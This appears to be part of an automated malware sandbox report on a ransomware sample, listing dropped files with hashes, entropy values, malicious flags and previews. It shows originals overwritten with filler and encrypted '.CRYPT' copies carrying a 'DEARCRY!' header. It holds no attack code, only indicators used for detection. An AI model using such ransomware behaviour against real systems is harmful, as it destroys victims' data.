AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):545064
                                                            Entropy (8bit):7.999669846962036
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:8B34DF1A9D28D571C057B2A2ECCA8030
                                                            SHA1:5DD89108FAF7E314314FBEA873CBE6A4E20B881C
                                                            SHA-256:7DC0A6CF0DA72FCE26E9D10B82529C41976FC21518AD01CCE791FF51142BD3FB
                                                            SHA-512:BBECD4ADC7F540F71DDBBAECED6CC5749E069A7A318F0BC2FE48BB228A7FBDF68B8979403E0888F65471915B22FDD759FEF9569B6DA339A1355DB84DEB836234
                                                            Malicious:true
                                                            Preview: DEARCRY!....U........0.........tw....B.d-.l.%.#..j.?.E..Q5..../...!..WE.P.].B...\..8>_...6A:v~aLD.|..7MF..E.f.......M4IL...AB.....9..K..Ho.......|.../..#.8up.I....Z....a..?\....u..X."..O..:...|....e.H8v...+...@A..w.!....#y9.P.66..1..........Q...hK..!........P......q...t..:......n<d.SR.8:t<... a(.?....g.[...,.....}._.S|j.....81T.(....$...m.]Z.:.65..#-.d.jMK.o.c..t. .V.#.ZrM...l..[..d...nO.@.H..;^....-)..1..Z.=U.1&.pbN...j6.....b\.j.zB.Y~......'..yS.u.].............g.o.n........9....'..`....O ..W.j'.d.8....Z.Y...._.)...v+..e..4^.....%b....B......N?MQ....B.......jQ%....{...G.6l+c.`.e..:."o3E..4.....D..S...JM,,..iF..B^Y6h......E.t..E/....+e...x[n....p..........U.O.L.d.......q....*/8#T.!.q...U.- .....u.X.....\.LU.K.....G...3.%...T6.......(1F.b..k.ep\....Ew8m.5...vh'A...r.e.*<&....@L...G......yp........2$..*.p_=+.....2.......7aL.$.bBDF.fo>.#.n}..0..DfK}.5..3U?;..1 N[.|....i.....H.).{....c9..u.Av......;..)7J".>.. n.M./|..M;.u.^..u#...b.
                                                            C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):114688
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:DB969CBD9E5C8C95F543116C2860E3CB
                                                            SHA1:E43CAA4378CFF595E791EC9F894C13ECA4E1889A
                                                            SHA-256:25BA42546BD187333C9C71D465B223DFDF6ACFFDDED731113D99CE8DB2F82275
                                                            SHA-512:062A0B1D90CED024BDF0170EEC9307AF529178112CE05D2198AC521971DEB313A759107D57775F02121FB72FE039BBD010C7B95CA5F80545B9E1D44192777AE9
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):116760
                                                            Entropy (8bit):7.9985306562246485
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:1E4D54A980270A9AC10F09E3F5594A30
                                                            SHA1:4773AD0F883E4C29985DA81D9A495D4288B1CC25
                                                            SHA-256:73845604F2B1B2BA76BCD0D966F5AC44A239AA33D6DFF41F88F83BA973AE2F21
                                                            SHA-512:36EEA481FE0E53CE57CB5CC946DEE2D98712C179E03EBCE4E87E054DBAF742470A24D07DF5AC412496164235040AFF5EAED625FC410079A10F4412CADFE45E74
                                                            Malicious:true
                                                            Preview: DEARCRY!.....8.....@..,..>.......U...t".......j;.+.1V..`l...7.k..^.a@...8.l..t.r.jf........S..."Adi4P.Yz.-BQG..........i&..*..LLz....I...2..Vm.]`....".Yq.nur.b..Va..-.%..=A..`..h...X.x.Jd.........f0.M.N.6D..0...f.. ...-...\..>.....k..h..2.c....}@.<.......@........0..E..].gl8...w..^5...h..G.&.Z..]....E.......D#.Oh......8....z.m4.%@K....(..NF.r..].r..j,.I......>.....0..D.~]..#E3.....Z..E"..i$...[ ,..1%...nr*.-..V..(.....*.......~...o..~D.p$.......G.._...FS.C.2.}h.....<D..C.L.{.s.m.%..i.!...y.....ifa,C0.8:.K......n.....$....Q.J< .GJ...u.Y.6.....$f...i.t..<...c..I.....R...z......S_.(.fk`u.. ...G....p>c.......?...AX=1q(.]....bz%.QD..p.f.A..[.F.H.........t..'...\\..^...;....'....u.>.........H.....S..o.&.#.SsQ. ...+..F\].W.8V.Ih...v...LX....G....{6..b.X.y..>z..$...&.z.W^..........t.x1.f.'.t.?..B.)....KR........&..w.P. ..y..............Q|.1a..1..5.iH_....f..J.7....?u.x.@..v.rl.mE.w..u.x...an..Hy.=i...U.k.&N}.~../..9...%P...q.&N.T.=k..V..
                                                            C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):292104
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:77D6EB9573ABC41939DEF71B0E67A00C
                                                            SHA1:661E1465E5BC783E93F4E45849992168057C9B21
                                                            SHA-256:612B52F387EF5898BC0560684CD0EE49B5ADFA5E7E393E226EF4AE09CC62E394
                                                            SHA-512:B8319713278415C4CFCFDF3444657BAC3829A911903DAF633C369E9C5ADFE5107DB9C97CF3A8C49BF915B12F587DBD42DEFE2D34D538C93DFDF20E8D3DD6FA47
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):292392
                                                            Entropy (8bit):7.999354641818523
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:9CE4206CFE83194D7DC7C700EA9AA36E
                                                            SHA1:6BDAEFD5ED0F3A0D00DE28C0E13149C7526F428A
                                                            SHA-256:7E371098EB017FE06E95CE5DC3596493624647A8775E31FB867FBC51A619A86F
                                                            SHA-512:B3ABE47282C88CAAAC9BB201F2879E5B60E8FDD5B449043785B3B590EEA81393CFDA751A9606EC71519BF2CC847A0D7A90C4F25346B319894EA0D27DF65C2D33
                                                            Malicious:true
                                                            Preview: DEARCRY!....=...9.e.)`........sc.z..5....z.'|/S.z...BJ.l.B.-7W..h.....&...{yJ.U.*6..%.V....$.....;..k$.!.....Iz........}e.i...}..,....W3......oG....|...|....`Y....{.C=Q...?..p..".q._<./[.f.b.6..nu...9.[m.l.'.)(:..6t`.d........%...c..6.."O..a...nv..E..\.Nq........u.........%|"....o..L..J.rl...k..yo].9......8..u.<|k..R.........=......e?_~....%.|m...d...h...(.....r..U.V.h.{........~.!.2C...=....9..<..O..p~.2..K.U.D.oS ...'`..-..I.}.^BY..w.`........,...g.yQ..0..C,l..1.......W...H.'.O..y...Aq2.R..X.....7.7...\@K...V....o.g.e.E.=@uI...B..C.Pjw...4.$......,.^B.....).L..3.....x...Z..v......*.....B["}.......T;...-d...q.sP+.."Z..stzU.@.m...~...b.4...N......H...Wak....X.z.*+.w....h..et?./...g.>*...U.'}(.QJ...lm....bj.?.....kw.l.).....g..d.......A3.q.L.".5..?.>....b..SA.6..N.EXPLOZ.q........p@.\.Ai.].y=...VB.(.;O...3U:)...Ly..5c..k.....h.....n.....$.m.`..8.V0v.e.m.N.m..:.U:..uRz...X.D...@.r....f.1.?../.:..Dm.....`+.......+.....-..0...@...........
                                                            C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000003.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1170304
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:1364C805AFF555E7449F6944E4D35554
                                                            SHA1:7D7E97D7A3F3D7C3038E82385D263B29A8939399
                                                            SHA-256:C619F15FC0676B16C45129D54CFAF866C16CA4EE21A5BF44E7FC25345343A620
                                                            SHA-512:6FB299C8A262FC02728BCA687718A45A7432F065DC18537B28697321DF64832A1EA62872A5A76B3EBA75FAC43C1BB68B96AB9B03AC7998778E79AF7A168F2A2E
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000003.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1171488
                                                            Entropy (8bit):7.999834229236215
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:7553FD2AF79C6D416CEF0E887E6EAA2D
                                                            SHA1:84C6ADE56D1C5258F9384A03BCDE9EF6042079A7
                                                            SHA-256:D44BE9F19BD46FFA5F2362812A1BA03774101C03FF1E6516D156B407EE1CE669
                                                            SHA-512:411A293431CD9392A5D8133311177012699DC224AFE26207DFD0853ACD4ED263BE1F520657B8EEF0A1767B2E418D65373090361FA501DFD2B7BBBA0E86AEB115
                                                            Malicious:true
                                                            Preview: DEARCRY!....R...4..Yh...(.....O.)...~..C%..]$...:.x.../..g.\....Da...P.....~\._..w...:_.h....?.S..@..*..&.l+.*JXi..R...M.k.._.zr.E.U.'....2z.....h.w.....AHe....lr....4m....J~nh.s....t....+LOT.!.w..G\<\.5......^..4....gS,..C2L.."a...<..[.yn-.|.SB~.......v......v6...e....?.L...>....n..8A..e2.Dc...:G.....m\XC0e..u.;c.W.DN.H.s.A9....6&K.`S$R..5.f...&...8..i..iPc.`......3EWe.5/.W...L...$(......Qj..x...............miP.,.,d..I......!A..(.O.`.8c.{Q..a..L....f....?5.r.7>......Qz.F...J=.h9..G.Ry?..P..19M.8.../&A.V...|.zg........^.?..X....o.r..Z.i....._.;Bh.[U6..#...`..._.XfG.LK...n.>.%.Rr-\Q. F.......aQ.).....F....r.>..o....a...c!.........#..h.g.u.....a..:m...<n.#b.1..f.&....fp.t...T..6...>i.S......,'x....(...N..<p....{...f%?......`.Bw^.^j.Q....g..!Znw,]......Z.....z,....w..!^Ox...c.........T.yL..Pd..%..h..F..A8Jj/.y.".e...R....|.=.w8.G.q+.\@...(..].A.....&k....9...Q..tV....f.........J....x..[1.*.h...$..z.aP .q.......&...L.....@.^.\.%.
                                                            C:\ProgramData\Microsoft\Windows\Caches\{7897343F-C962-4E34-BF39-1C4346974441}.2.ver0x0000000000000001.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):4960
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:81FB43DFBA35E683356AD3A532BA0BE0
                                                            SHA1:31BB5E7947061DC6506F623B9A71A3DA9FFE07A1
                                                            SHA-256:3B7EA9A30A6BB70A5FDF3C8B688F68DBDD3F01AD3CF33DEA5C95169D02000D64
                                                            SHA-512:2C2F1277073FD734BC01FBD241ACB26597E18B15590E200A554507F8F08A49B60D9BDAE6650688CA639D8A78713407627A74BD08EDF278160F32EC0F7039665F
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Caches\{7897343F-C962-4E34-BF39-1C4346974441}.2.ver0x0000000000000001.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6112
                                                            Entropy (8bit):7.959586711706782
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B9CA46A1A63E80DC658C5D738C25F376
                                                            SHA1:8BA449DBDD75BBF68E046A6F7ED0A4DD0601D522
                                                            SHA-256:4CECBF0ECA5BC4FD7FB040D0DA85B090453465A9427DFCFA14171BA658E18D7F
                                                            SHA-512:3D9AA54B7E3926BF8E5FDF23EB2D77098BDCEEC66A93A4FF762AE33D34C782DDBE857E1E6DDC99F6F85C9CABF105BCF9442AB3A42DA42435AF50DC7D663BF0CA
                                                            Malicious:false
                                                            Preview: DEARCRY!.....J....(...2..U.....*..GM.0.@~...x.o+......N..T.....u..b..b...Z.Q ..0)..&.|....W.....Dw..~:Zn....I........-...u8V........qJ...b...Qj......M..B.^.........:.!....;Km.._"g..9?EK...9:..D......Vm.9<x.._.S......(..]....9g....,X......}..M2.............Ob..kiez.....4..(P.H)..*)..:e....aR..I..x.$.T...._..*.n...`......<6.....E.r.....o...H..VyO...+.C......\..K..7.%........T...y...{...S!e..a....;5M........+$-Xt..C....;B.|.70..?.J...:......E.(.#.......{.C..G.Mx...\..uK......r...-b/.....i...4$4..H.....8~u..>".tX...K.f...3..09.Q....D@F..XE.VkR.F...Kk..Q.R.}u.N..F}tL]Rn2F.4.,'.A.+V`.m...%._aG_...h.LA6.#....n";.Td9/....G..........Q..........d..A.#a....G.....>.C..O.....B..g.._7.wNo.":fW9...,...%h.q...L,..l..<.......&rk..(|...b..El.D..vu."..E.Y\9A.Rm.*..y../6...'....o..c.`j....i.r...(...?....A_b.Q.....k..o.#{8.f|.g.[.L...m.....f0b.x......K...H_g5..MO~..x._.....r..O....(M.....ec.3....2..F.j...ZH.=..2.".<..;.O.^A...[..+*.......b...;..V.k...C&.
                                                            C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2525056
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BA31D6FD11B40FB6B31BB4442BB013D7
                                                            SHA1:8B5725602A9DBADCC50138D41E41C5FC0C8A434D
                                                            SHA-256:D147A8FC46A963807698082C1291332156F092F745777CC69B993147B3C39098
                                                            SHA-512:7349079E332A85E314C38803782CB9E4AB73E976DD91C7B9E4A8167FA8BEAA02FA783DA4A2CC81EC8725BC7D2771F5E313EF181B63538AB83A54A068F451136D
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2526240
                                                            Entropy (8bit):7.999919924975775
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:A7D04250211F78BF2DB9E3A8E099F6B5
                                                            SHA1:71D0294DF8DB9164D0D736707122745BD14056E8
                                                            SHA-256:E1D76CC9C799A2BF9505B1D253808C7849C206A74E01B03C7E5DB2B057E010E5
                                                            SHA-512:85BFF8FA91928BE754D2A31B5F6A54F9E6AEC82AEAEDE42816464F26FA3D85BB49A1AD7BF2DF8FC3ED41411ACDE5E4703C9283A8E4CBFA788C6B7BC81B241B09
                                                            Malicious:true
                                                            Preview: DEARCRY!........U..i.ZU..$....j.`\..0u.\<.Z&..U.u&.J.+..?z@X..q.b........xyn#.Veo...u.....kS,...>o...i. .@.z#.~x/.)'..L..tG..q..V..f.Y......".yp.|..T....JN..Vd.R..X.*.>...L..ZC...~/..$Jj..t.i...<Ou.!.%d....*....z.....*....7}...dA.e#......_.W.@.B..q.j.'.B.yk.............1(6E...z....:...Yz./p.Aq,2........W.M@.[Zy....L.q..zR0.D<'...$.J........6~.r....D.Ho.}..s......I....78MJ.:.?...~._J..%...OP.u~E....;.O..z......p~......*6A..M..}/t.... ._.o4.j..\.'.F..}.i.e......xEh....O...i.r..).F...%..m.$..}O.O..;.nJ!~xQ.}..........Ss....:..r.Q.W~..x.....=.!Gku.iqG..*c..'c.;l.>........n.<..%J..0._J...>a0.G..Q.....".u.:F...H)..g..?...................v.]B....|QG.Q..)ML._.....Z.E.f.0.M..}....$..{.'...^....#..I0?w...d.$@.f..!..@..4P..&.8.....B.aZ?i.&q.....,....I[..2b.@9.o~....w.....'.. /a5......]M.s.....F.&_.G.....*.....|1w..k.B....?]@...x...e..5.g...xv"1 n..b:..#.w=...Q.R.T....."..Vz+g. .q.an...+..E.hL?[.?3TE'.*t.ND..t..B...\....@.u...b..R..<J.p......_^
                                                            C:\ProgramData\Microsoft\Windows\Caches\{FE0954D6-6B08-46D7-A05D-C49BC35F188E}.2.ver0x0000000000000001.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):4960
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:81FB43DFBA35E683356AD3A532BA0BE0
                                                            SHA1:31BB5E7947061DC6506F623B9A71A3DA9FFE07A1
                                                            SHA-256:3B7EA9A30A6BB70A5FDF3C8B688F68DBDD3F01AD3CF33DEA5C95169D02000D64
                                                            SHA-512:2C2F1277073FD734BC01FBD241ACB26597E18B15590E200A554507F8F08A49B60D9BDAE6650688CA639D8A78713407627A74BD08EDF278160F32EC0F7039665F
                                                            Malicious:false
